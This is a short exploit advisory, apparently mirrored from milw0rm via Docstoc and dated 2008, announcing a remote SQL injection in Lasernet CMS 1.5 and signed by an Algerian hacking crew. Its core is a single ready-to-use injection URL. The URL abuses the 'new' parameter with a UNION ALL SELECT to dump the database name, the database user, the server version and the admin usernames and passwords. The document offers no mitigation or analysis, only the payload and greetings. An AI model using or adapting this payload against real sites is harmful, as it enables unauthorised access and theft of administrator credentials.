Lasernet CMS 1.5 new Remote SQL Injection Vulnerability

Document Sample
Lasernet CMS 1.5 new Remote SQL Injection Vulnerability Powered By Docstoc
					                        Lasernet CMS 1.5 new Remote SQL Injection Vulnerability                                   Page 1/1
  1    ###################################################
  2    [~] Lasernet CMS v1.5 Remote Sql Ä°nj. Vuln.
  3
  4    [~] Founder: cO2 [ Algeria Security Crew ]
  5    [~] HomePage: http://www.DZ−Secure.com
  6    [~] Greatz : To all Hackerz from Algeria & All My Friends . . .
  7    [~] Contact: c02@Hotmail.de
  8    [~] Exploit :
  9    http://www.xxx.org//index.php?id=new&new=−1’%20UNION%20ALL%20SELECT%201,2,concat(database(),char(58),user(),char(58),
       version()),concat(username,0x3e,password),5,6,7,8,9+from+admins/*
  10   −−−−−−−−−−−−−−−−−−−−−
  11   http://www.DZ−Secure.com
  12   −−−−−−−−−−−−−−−−−−−−−
  13   ###############################################
  14
  15   # milw0rm.com [2008−04−15]




cO2                                                                                                                04/15/2008

				
DOCUMENT INFO